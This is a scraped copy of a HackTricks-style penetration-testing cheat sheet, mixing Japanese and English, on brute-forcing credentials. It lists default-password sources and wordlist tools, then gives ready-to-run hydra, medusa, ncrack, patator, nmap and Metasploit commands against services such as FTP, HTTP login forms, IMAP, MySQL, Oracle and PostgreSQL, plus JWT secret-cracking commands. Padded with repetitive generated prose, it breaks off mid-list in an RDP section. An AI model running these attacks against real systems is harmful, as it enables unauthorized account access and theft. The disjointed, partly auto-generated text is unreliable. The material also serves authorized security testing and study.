109 KiB
ブルートフォース - チートシート
Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築し、自動化します。
今すぐアクセスを取得:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、最新バージョンのPEASSを入手したいですか、またはHackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを見つけてください、私たちの独占的なNFTのコレクション
- 公式のPEASS&HackTricks swagを手に入れましょう
- 💬 Discordグループまたはtelegramグループに参加するか、Twitterで私をフォローしてください🐦@carlospolopm.
- ハッキングのトリックを共有するには、PRを hacktricks repo と hacktricks-cloud repo に提出してください。
デフォルトの資格情報
使用されている技術のデフォルトの資格情報をGoogleで検索するか、次のリンクを試してください:
- https://github.com/ihebski/DefaultCreds-cheat-sheet
- http://www.phenoelit.org/dpl/dpl.html
- http://www.vulnerabilityassessment.co.uk/passwordsC.htm
- https://192-168-1-1ip.mobi/default-router-passwords-list/
- https://datarecovery.com/rd/default-passwords/
- https://bizuns.com/default-passwords-list
- https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv
- https://github.com/Dormidera/WordList-Compendium
- https://www.cirt.net/passwords
- http://www.passwordsdatabase.com/
- https://many-passwords.github.io/
- https://theinfocentric.com/
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%
Cewl
Cewl is a tool used for generating custom wordlists by scraping websites or documents. It can be helpful in performing brute force attacks by creating wordlists based on the target's specific interests or preferences.
To use Cewl, you need to provide it with a starting URL or a file containing text. It will then crawl the website or analyze the document to extract words and phrases. By applying various filters and options, you can customize the wordlist generation process to suit your needs.
Cewl can be particularly useful when targeting individuals or organizations with specific interests or when trying to crack passwords based on personal information. By creating wordlists that are tailored to the target, you increase the chances of success in a brute force attack.
To run Cewl, you can use the following command:
cewl [options] <URL or file>
Some common options include:
-d
: Set the depth of the crawl (default is 2).-m
: Set the minimum word length (default is 3).-w
: Specify the output file for the wordlist.
Cewl is a powerful tool that can enhance the effectiveness of brute force attacks by generating targeted wordlists. However, it is important to use it responsibly and ethically, ensuring that you have proper authorization before conducting any penetration testing activities.
cewl example.com -m 5 -w words.txt
CUPP
被害者の情報(名前、日付など)に基づいてパスワードを生成します。
python3 cupp.py -h
Wister
Wisterは、単語リスト生成ツールであり、特定のターゲットに関連する使用するためのユニークで理想的な単語リストを作成するために、与えられた単語から複数のバリエーションを作成することができます。
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
__ _______ _____ _______ ______ _____
\ \ / /_ _|/ ____|__ __| ____| __ \
\ \ /\ / / | | | (___ | | | |__ | |__) |
\ \/ \/ / | | \___ \ | | | __| | _ /
\ /\ / _| |_ ____) | | | | |____| | \ \
\/ \/ |_____|_____/ |_| |______|_| \_\
Version 1.0.3 Cycurity
Generating wordlist...
[########################################] 100%
Generated 67885 lines.
Finished in 0.920s.
pydictor
ワードリスト
- https://github.com/danielmiessler/SecLists
- https://github.com/Dormidera/WordList-Compendium
- https://github.com/kaonashi-passwords/Kaonashi
- https://github.com/google/fuzzing/tree/master/dictionaries
- https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
- https://weakpass.com/wordlist/
- https://wordlists.assetnote.io/
- https://github.com/fssecur3/fuzzlists
- https://hashkiller.io/listmanager
- https://github.com/Karanxa/Bug-Bounty-Wordlists
Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築および自動化します。
今すぐアクセスを取得:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
サービス
サービス名でアルファベット順に並べられています。
AFP
nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> run
AJP
AJP (Apache JServ Protocol) is a protocol used by Apache Tomcat to communicate with web servers. It is similar to the HTTP protocol but is more efficient for handling Java-based applications.
A common attack method against AJP is brute force, where an attacker attempts to guess the username and password combination to gain unauthorized access to the server. Brute force attacks can be automated using tools like Hydra or Burp Suite.
To protect against brute force attacks on AJP, it is important to use strong and unique passwords for all user accounts. Additionally, implementing account lockout policies can help prevent repeated login attempts. Monitoring server logs for suspicious activity and implementing rate limiting can also be effective in mitigating brute force attacks.
It is recommended to regularly update and patch the server software to address any vulnerabilities that could be exploited by attackers. Regular security audits and penetration testing can also help identify and address any weaknesses in the server's configuration.
By following these best practices, you can enhance the security of your AJP-enabled server and reduce the risk of unauthorized access.
nmap --script ajp-brute -p 8009 <IP>
ブルートフォース攻撃
ブルートフォース攻撃は、暗号化されたデータやパスワードを解読するために使用される一般的な攻撃手法です。この攻撃手法では、すべての可能な組み合わせを試し、正しい組み合わせを見つけるまで繰り返し実行します。
ブルートフォース攻撃の手法
-
辞書攻撃: 事前に作成された辞書ファイルを使用して、一連の単語やフレーズを試します。一般的なパスワードや一般的な単語の組み合わせを網羅しています。
-
総当たり攻撃: すべての可能な組み合わせを順番に試します。この手法は非常に時間がかかる場合がありますが、正しい組み合わせを見つけるまで続けることができます。
-
ハイブリッド攻撃: 辞書攻撃と総当たり攻撃を組み合わせた手法です。まず辞書攻撃を試し、その後総当たり攻撃を行います。
ブルートフォース攻撃の対策
ブルートフォース攻撃からデータやパスワードを保護するためには、以下の対策を講じることが重要です。
-
強力なパスワードの使用: パスワードは長く、複雑な組み合わせで作成する必要があります。一般的な単語やパターンを避け、大文字と小文字、数字、特殊文字を組み合わせるようにしましょう。
-
ロックアウト機能の有効化: ブルートフォース攻撃を防ぐために、一定回数の誤った試行後にアカウントをロックアウトする機能を有効にしましょう。
-
二要素認証の使用: パスワードだけでなく、追加の認証要素(SMSコード、ワンタイムパスワードなど)を使用してアカウントを保護しましょう。
-
ログ監視: ブルートフォース攻撃の試行を監視し、異常なアクティビティを検出するためにログを監視しましょう。
-
キャプチャの使用: ブルートフォース攻撃を防ぐために、キャプチャ(画像認証)を使用して自動化された攻撃を防止しましょう。
以上がブルートフォース攻撃に関する基本的な情報です。これらの手法と対策を理解し、適切なセキュリティ対策を講じることが重要です。
nmap --script cassandra-brute -p 9160 <IP>
CouchDB
CouchDBは、ドキュメント指向のデータベースであり、HTTPプロトコルを使用してデータにアクセスすることができます。CouchDBは、データベースのブルートフォース攻撃に対して脆弱性を持っていることが知られています。ブルートフォース攻撃は、総当たり攻撃とも呼ばれ、パスワードや認証情報を推測するために連続的に試行する攻撃手法です。
CouchDBのブルートフォース攻撃を防ぐためには、以下の方法があります。
-
強力なパスワードの使用: CouchDBには、強力なパスワードを使用することが重要です。パスワードは、長さが十分であり、大文字と小文字、数字、特殊文字を組み合わせたものを選ぶべきです。
-
ログイン試行回数の制限: CouchDBには、ログイン試行回数を制限する機能があります。これにより、攻撃者が連続してパスワードを試行することを防ぐことができます。ログイン試行回数の制限は、CouchDBの設定ファイルで構成することができます。
-
IP制限: CouchDBには、特定のIPアドレスからのアクセスを制限する機能もあります。これにより、不正なアクセス元からのブルートフォース攻撃を防ぐことができます。IP制限は、CouchDBの設定ファイルで設定することができます。
これらの対策を実施することで、CouchDBのブルートフォース攻撃を防ぐことができます。ただし、常に最新のセキュリティパッチを適用し、セキュリティ意識を高めることも重要です。
msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
Docker Registry
Docker Registryは、Dockerイメージを保存、管理、配布するためのオープンソースのアプリケーションです。Dockerイメージは、コンテナ化されたアプリケーションやサービスのビルドブロックです。
Docker Registryは、Dockerイメージを保存するための中央リポジトリとして機能します。Dockerイメージは、Docker Hubなどの公開レジストリから取得することもできますが、プライベートな環境で使用する場合は、独自のDocker Registryを構築することができます。
Docker Registryは、RESTful APIを介してアクセスできるため、イメージのアップロード、ダウンロード、削除などの操作を行うことができます。また、認証やアクセス制御の設定も可能です。
Docker Registryのセキュリティを確保するためには、適切な認証とアクセス制御の設定が重要です。また、強力なパスワードポリシーやTLS/SSLの使用も推奨されます。
Docker Registryは、Dockerイメージのバージョン管理やセキュリティパッチの適用など、効率的なイメージ管理を実現するための重要なツールです。
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
Elasticsearch
Elasticsearch is a distributed, RESTful search and analytics engine built on top of Apache Lucene. It provides a scalable solution for storing, searching, and analyzing large volumes of data in real-time.
Brute Force Attacks
Brute force attacks are a common method used by hackers to gain unauthorized access to systems or accounts. In a brute force attack, the hacker systematically tries all possible combinations of usernames and passwords until the correct one is found.
Brute Forcing Elasticsearch
Brute forcing Elasticsearch involves attempting to guess the credentials of an Elasticsearch cluster in order to gain unauthorized access. This can be done by using automated tools that systematically try different combinations of usernames and passwords.
To protect against brute force attacks, it is important to implement strong authentication mechanisms, such as using complex passwords and enabling account lockouts after a certain number of failed login attempts. Additionally, monitoring and logging failed login attempts can help detect and respond to brute force attacks in a timely manner.
Conclusion
Brute force attacks can pose a significant threat to the security of Elasticsearch clusters. By implementing strong authentication mechanisms and monitoring failed login attempts, organizations can mitigate the risk of unauthorized access through brute force attacks.
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
FTP
FTP(File Transfer Protocol)は、ファイルをサーバーとクライアント間で転送するためのプロトコルです。FTPサーバーには、ファイルのアップロードやダウンロードを行うための認証情報が必要です。一般的な認証方法には、ユーザー名とパスワードの組み合わせがあります。
ブルートフォース攻撃は、FTPサーバーへのアクセスを試みる際に使用される一般的な攻撃手法の1つです。この攻撃では、ハッカーは自動化されたツールを使用して、さまざまなユーザー名とパスワードの組み合わせを試し、正しい認証情報を見つけ出そうとします。
ブルートフォース攻撃は、パスワードが弱い場合や、ユーザー名とパスワードの組み合わせが予測しやすい場合に特に効果的です。ハッカーは、辞書攻撃やランダムな文字列の組み合わせを使用して、認証情報を推測しようとします。
FTPサーバーのブルートフォース攻撃を防ぐためには、強力なパスワードポリシーを実施し、ユーザーが簡単に推測できないようなパスワードを使用することが重要です。また、アカウントロックアウトやIP制限などのセキュリティ対策も有効です。
ブルートフォース攻撃は、セキュリティテストやペネトレーションテストの一環として使用されることもあります。これにより、システムの脆弱性を特定し、適切な対策を講じることができます。
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
HTTPジェネリックブルート
WFuzz
HTTPベーシック認証
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
HTTP - ポストフォーム
Brute forcing a login form is a common technique used to gain unauthorized access to a web application. In this method, an attacker systematically tries different combinations of usernames and passwords until a successful login is achieved.
ポストフォームのブルートフォース攻撃は、ウェブアプリケーションへの不正アクセスを試みるためによく使われる手法です。この方法では、攻撃者はユーザー名とパスワードの異なる組み合わせをシステム的に試し、成功するログインを狙います。
To perform a brute force attack on a login form, the attacker needs to send multiple HTTP POST requests with different username and password combinations. The attacker can automate this process using tools like Hydra or Burp Suite.
ログインフォームへのブルートフォース攻撃を実行するには、攻撃者は異なるユーザー名とパスワードの組み合わせで複数のHTTP POSTリクエストを送信する必要があります。攻撃者は、HydraやBurp Suiteなどのツールを使用してこのプロセスを自動化することができます。
It is important to note that brute forcing a login form is a time-consuming process and may trigger account lockouts or other security measures. Therefore, it is recommended to use this technique responsibly and with proper authorization.
ログインフォームのブルートフォース攻撃は時間がかかるプロセスであり、アカウントのロックアウトや他のセキュリティ対策を引き起こす可能性があることに注意してください。したがって、この技術を責任を持って適切な認可を得て使用することをお勧めします。
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https
For https you have to change from "http-post-form" to "https-post-form"
HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
IMAP (Internet Message Access Protocol) is a widely used protocol for email retrieval. It allows users to access their email messages on a remote mail server. IMAP supports both online and offline modes, allowing users to manage their email messages even when they are not connected to the server.
Brute-Forcing IMAP Credentials
Brute-forcing is a common technique used to gain unauthorized access to IMAP accounts. It involves systematically trying all possible combinations of usernames and passwords until the correct credentials are found.
To perform a brute-force attack on an IMAP server, you can use tools like Hydra or Medusa. These tools automate the process of trying different username and password combinations, making it easier to find the correct credentials.
Before launching a brute-force attack, it is important to gather information about the target, such as the email address format and any known usernames. This information can help narrow down the list of possible usernames to try.
It is also important to use a good wordlist for the password guessing phase. A wordlist is a file containing a list of commonly used passwords, dictionary words, and other possible combinations. Tools like Crunch or Cewl can be used to generate custom wordlists based on specific criteria.
To increase the chances of success, it is recommended to use a combination of different attack vectors, such as a dictionary attack, a hybrid attack, or a mask attack. These attack vectors can help optimize the brute-forcing process by focusing on the most likely password combinations first.
However, it is important to note that brute-forcing is a time-consuming process and may not always be successful. Many email providers have implemented security measures to detect and block brute-force attacks, such as account lockouts or CAPTCHA challenges.
Therefore, it is crucial to use brute-forcing techniques responsibly and only on systems that you have proper authorization to test. Unauthorized access to someone else's email account is illegal and unethical. Always obtain proper permission and follow legal and ethical guidelines when performing any kind of security testing or penetration testing.
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
IRC(Internet Relay Chat)は、インターネット上でリアルタイムのテキストベースのコミュニケーションを可能にするプロトコルです。IRCは、チャットルームと呼ばれるグループチャットの形式を提供し、ユーザーはテキストメッセージを送信し、他のユーザーと対話することができます。
IRCサーバーに対するブルートフォース攻撃は、ユーザー名とパスワードの組み合わせを総当たりで試行し、正しい認証情報を見つけることを試みる攻撃手法です。攻撃者は、自動化されたツールを使用して、大量のユーザー名とパスワードを試行し、正しい組み合わせを見つけることを目指します。
ブルートフォース攻撃は、弱いパスワードを使用しているユーザーに対して特に効果的です。攻撃者は、一般的なパスワードや辞書攻撃を使用して、パスワードを推測することができます。また、攻撃者は、ユーザー名やパスワードのリストを入手するために、他のデータ侵害や情報漏洩を利用することもあります。
ブルートフォース攻撃を防ぐためには、強力なパスワードポリシーを実施し、ユーザーに安全なパスワードの使用を促す必要があります。また、アカウントロックアウトやIP制限などのセキュリティメカニズムを導入することも有効です。さらに、二要素認証や多要素認証を使用することで、セキュリティを強化することができます。
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
ISCSI
iSCSI (Internet Small Computer System Interface) is a protocol that allows the transmission of SCSI commands over IP networks. It enables the use of storage devices over a network, making it possible to access remote storage resources as if they were local.
iSCSI works by encapsulating SCSI commands into IP packets, which are then transmitted over TCP/IP networks. This allows for the remote mounting of storage devices, such as disks or tape drives, on a client system.
One of the advantages of iSCSI is its flexibility and compatibility with existing infrastructure. It can be used with both Ethernet and Fibre Channel networks, and can leverage existing IP-based networks for storage connectivity.
However, the use of iSCSI also introduces security risks. Since iSCSI relies on IP networks, it is susceptible to attacks such as eavesdropping, tampering, and unauthorized access. Therefore, it is important to implement security measures, such as authentication and encryption, to protect iSCSI traffic.
Overall, iSCSI provides a convenient and efficient way to access remote storage resources. By understanding its capabilities and implementing appropriate security measures, organizations can leverage iSCSI to enhance their storage infrastructure.
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
JWT(JSON Web Token)は、認証と情報の安全な伝送を可能にするためのオープンスタンダードです。JWTは、クライアントとサーバー間でデータを安全にやり取りするために使用されます。JWTは、ユーザーの認証情報やその他の情報を含むJSON形式のトークンです。
JWTは、3つのセクションから構成されています。ヘッダー、ペイロード、署名です。ヘッダーには、トークンのタイプや使用するアルゴリズムなどのメタデータが含まれます。ペイロードには、ユーザーの情報やその他のカスタムデータが含まれます。署名は、トークンの完全性を確保するために使用されます。
JWTの攻撃に対する主な脆弱性は、トークンの漏洩です。トークンが漏洩すると、攻撃者はトークンを使用して不正なアクセスを行うことができます。そのため、JWTを使用する際には、適切なセキュリティ対策を講じる必要があります。
一般的な攻撃手法の1つは、ブルートフォース攻撃です。ブルートフォース攻撃では、攻撃者が可能なすべての組み合わせを試し、正しいトークンを見つけることを試みます。この攻撃を防ぐためには、強力なパスワードポリシーを実装し、トークンの有効期限を短くするなどの対策が必要です。
また、JWTの署名アルゴリズムの選択も重要です。弱い署名アルゴリズムを使用すると、攻撃者がトークンを改ざんする可能性があります。したがって、信頼性の高い署名アルゴリズムを選択することが重要です。
最後に、JWTのセキュリティを向上させるためには、トークンの監視とリフレッシュが重要です。トークンの監視により、不正なアクセスを早期に検出することができます。また、トークンのリフレッシュにより、トークンの有効期限を延長することができます。
以上がJWTに関する基本的な情報と、その攻撃に対する対策です。JWTを使用する際には、これらのセキュリティ対策を講じることをお勧めします。
#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt <JWT token>
#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
LDAP
LDAP(Lightweight Directory Access Protocol)は、ディレクトリサービスにアクセスするためのプロトコルです。ディレクトリサービスは、ユーザー、グループ、コンピュータなどの情報を格納するために使用されます。LDAPは、ディレクトリサービスに対して検索、追加、変更、削除などの操作を行うための方法を提供します。
LDAPブルートフォース攻撃は、LDAPサーバーに対して総当たり攻撃を行う手法です。攻撃者は、ユーザー名とパスワードの組み合わせを試し、正しい認証情報を見つけることを目指します。この攻撃は、弱いパスワードを使用しているユーザーアカウントを特定するために使用されます。
LDAPブルートフォース攻撃は、一般的に辞書攻撃と組み合わせて使用されます。辞書攻撃では、一連の一般的なパスワードを試すことで、攻撃者は成功する可能性を高めます。攻撃者は、LDAPサーバーに対して多数のリクエストを送信し、正しい認証情報を見つけるまで続けます。
LDAPブルートフォース攻撃を防ぐためには、強力なパスワードポリシーを実装し、パスワードの複雑さを強化する必要があります。また、アカウントロックアウトポリシーを設定することも重要です。これにより、一定回数の認証失敗後にアカウントがロックアウトされ、攻撃者の総当たり攻撃を防ぐことができます。
LDAPブルートフォース攻撃は、セキュリティテストやペネトレーションテストの一環として使用されることがあります。これにより、組織は自身のLDAPサーバーの脆弱性を特定し、適切な対策を講じることができます。
nmap --script ldap-brute -p 389 <IP>
MQTT
MQTT(Message Queuing Telemetry Transport)は、軽量なメッセージングプロトコルであり、IoT(Internet of Things)デバイス間の通信に広く使用されています。このプロトコルは、低帯域幅や不安定なネットワーク環境でも効率的に動作します。
MQTTは、パブリッシャーとサブスクライバーの2つの役割を持つクライアント間の非同期通信を可能にします。パブリッシャーはメッセージをトピックにパブリッシュし、サブスクライバーは特定のトピックに対してサブスクライブしてメッセージを受信します。
MQTTのセキュリティには注意が必要です。デフォルトでは、MQTTは認証や暗号化を提供しません。したがって、セキュリティを強化するためには、TLS(Transport Layer Security)を使用するか、ユーザー名とパスワードを設定する必要があります。
MQTTのブルートフォース攻撃は、パスワードの推測を試みることで行われます。攻撃者は、一連の一般的なパスワードを試し、正しいパスワードを見つけることを目指します。この攻撃を防ぐためには、強力なパスワードポリシーを実装し、パスワードの推測を困難にする必要があります。
MQTTのセキュリティを確保するためには、以下の対策を講じることが重要です。
- デフォルトのユーザー名とパスワードを変更する
- TLSを使用して通信を暗号化する
- ファイアウォールを使用して不正なアクセスを防止する
- パスワードポリシーを実装し、強力なパスワードを使用する
- ブルートフォース攻撃を検知するためのログ監視を行う
これらの対策を実施することで、MQTTのセキュリティを向上させることができます。
ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v
ブルートフォース攻撃
ブルートフォース攻撃は、Mongoデータベースに対して非常に効果的な攻撃手法です。この攻撃手法では、すべての可能なパスワードの組み合わせを試し、正しいパスワードを見つけることを目指します。
以下は、Mongoデータベースに対するブルートフォース攻撃の手順です。
- ユーザー名のリストを取得します。
- パスワードのリストを取得します。
- ユーザー名とパスワードの組み合わせを作成します。
- 作成した組み合わせを使用してMongoデータベースにログインを試みます。
- 正しい組み合わせが見つかるまで、ステップ4を繰り返します。
ブルートフォース攻撃は非常に時間がかかる場合がありますが、強力なパスワードを使用している場合には成功する可能性が低くなります。したがって、セキュリティを強化するためには、強力なパスワードポリシーを採用することが重要です。
また、ブルートフォース攻撃を防ぐためには、以下の対策を講じることが推奨されます。
- パスワードの複雑さを増す
- ログイン試行回数の制限を設定する
- 2要素認証を使用する
以上がMongoデータベースに対するブルートフォース攻撃に関する情報です。セキュリティを強化するためには、適切な対策を講じることが重要です。
nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
MySQL
MySQLは、オープンソースのリレーショナルデータベース管理システムであり、多くのウェブアプリケーションやウェブサイトで使用されています。MySQLデータベースへの不正アクセスを試みる際に、ブルートフォース攻撃は一般的な手法の1つです。
ブルートフォース攻撃は、総当たり攻撃とも呼ばれ、パスワードを推測するために連続的に試行する手法です。攻撃者は、一連のパスワードを自動的に生成し、それらを順番に試して、正しいパスワードを見つけることを目指します。
MySQLのブルートフォース攻撃では、一般的にユーザー名とパスワードの組み合わせを試行します。攻撃者は、一般的なユーザー名やパスワード、辞書攻撃、またはランダムな文字列を使用して攻撃を行います。
ブルートフォース攻撃を防ぐためには、強力なパスワードポリシーを実装し、パスワードの複雑さを確保することが重要です。また、アカウントロックアウト機能やIP制限などのセキュリティメカニズムを使用することも有効です。
MySQLのブルートフォース攻撃を検出するためには、ログイン試行の異常な増加や特定のユーザー名/パスワードの連続試行などのパターンを監視することが重要です。また、侵入検知システムやログ監視ツールを使用することも推奨されます。
ブルートフォース攻撃は、時間とリソースがかかるため、強力なパスワードやセキュリティ対策があれば、成功する可能性は低くなります。したがって、MySQLデータベースのセキュリティを確保するためには、適切な対策を講じることが重要です。
# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql
# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
Brute Force
Brute force is a common method used in penetration testing to crack passwords or encryption keys by systematically trying all possible combinations until the correct one is found. This technique is often used when other methods, such as dictionary attacks or rainbow table attacks, are not successful.
In the context of Oracle SQL, brute force can be used to gain unauthorized access to a database by guessing the username and password combination. This can be done by using automated tools or scripts that iterate through a list of commonly used usernames and passwords, or by manually trying different combinations.
To protect against brute force attacks, it is important to use strong and unique passwords, implement account lockout policies, and monitor for suspicious login attempts. Additionally, using two-factor authentication can add an extra layer of security by requiring a second form of verification, such as a code sent to a mobile device, in addition to the username and password.
While brute force attacks can be effective, they can also be time-consuming and resource-intensive. Therefore, it is important for organizations to regularly assess and strengthen their security measures to mitigate the risk of brute force attacks.
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>
#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>
#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
oracle_loginをpatatorと一緒に使用するためには、以下の手順でインストールする必要があります:
pip3 install cx_Oracle --upgrade
オフラインOracleSQLハッシュブルートフォース (バージョン11.1.0.6、11.1.0.7、11.2.0.1、11.2.0.2、および11.2.0.3):
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
Brute force is a common method used in hacking to gain unauthorized access to a system or account by systematically trying all possible combinations of passwords until the correct one is found. This method is often used when other methods, such as social engineering or exploiting vulnerabilities, are not successful.
Brute force attacks can be time-consuming and resource-intensive, especially if the password being targeted is long and complex. However, they can be effective against weak passwords or poorly implemented security measures.
There are several tools and resources available for conducting brute force attacks, including specialized software and scripts. These tools automate the process of trying different passwords and can be customized to target specific systems or accounts.
It is important to note that brute force attacks are illegal and unethical unless conducted with proper authorization and for legitimate purposes, such as penetration testing. Unauthorized brute force attacks can result in criminal charges and severe penalties.
To protect against brute force attacks, it is recommended to use strong, unique passwords that are not easily guessable. Additionally, implementing account lockouts, rate limiting, and CAPTCHA can help prevent automated brute force attacks. Regularly updating software and systems with the latest security patches can also help mitigate the risk of brute force attacks.
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
PostgreSQL
PostgreSQLはオープンソースのリレーショナルデータベース管理システムです。PostgreSQLは高い信頼性と拡張性を提供し、さまざまなアプリケーションに使用されています。PostgreSQLのデフォルトの設定では、セキュリティが強化されており、一般的な攻撃から保護されています。
しかし、ブルートフォース攻撃は、PostgreSQLデータベースに対する一般的な攻撃手法の1つです。ブルートフォース攻撃では、攻撃者は総当たりで可能なすべてのパスワードを試し、正しいパスワードを見つけることを試みます。
ブルートフォース攻撃を防ぐためには、強力なパスワードポリシーを実装し、パスワードの複雑さを確保する必要があります。また、アカウントロックアウト機能を有効にすることも重要です。これにより、一定回数の誤ったパスワード試行後にアカウントがロックされるようになります。
さらに、PostgreSQLのログイン情報を保護するために、適切なアクセス制御を実施することも重要です。不要なユーザーアカウントを削除し、必要な権限を持つユーザーにのみアクセスを許可するようにします。
ブルートフォース攻撃を検知するためには、ログ監視ツールを使用することが有効です。ログ監視ツールは、異常なログイン試行やパスワードの総当たり攻撃を検知し、適切な対策を講じることができます。
最後に、PostgreSQLのバージョンを最新のものに保つことも重要です。最新のバージョンには、セキュリティの脆弱性が修正されている場合があります。定期的なアップデートを行うことで、セキュリティを強化することができます。
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
PPTP
https://http.kali.org/pool/main/t/thc-pptp-bruter/から.deb
パッケージをダウンロードしてインストールすることができます。
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>
RDP
RDP (Remote Desktop Protocol) is a proprietary protocol developed by Microsoft that allows users to remotely access and control a computer over a network. It is commonly used for remote administration and remote support purposes.
Brute Force Attack on RDP
A brute force attack on RDP involves systematically trying all possible combinations of usernames and passwords until the correct credentials are found. This is done by using automated tools that can rapidly generate and test login credentials.
Steps to Perform a Brute Force Attack on RDP
-
Identify the target RDP server: Determine the IP address or hostname of the RDP server that you want to attack.
-
Choose a brute force tool: Select a reliable and efficient brute force tool that supports RDP protocol.
-
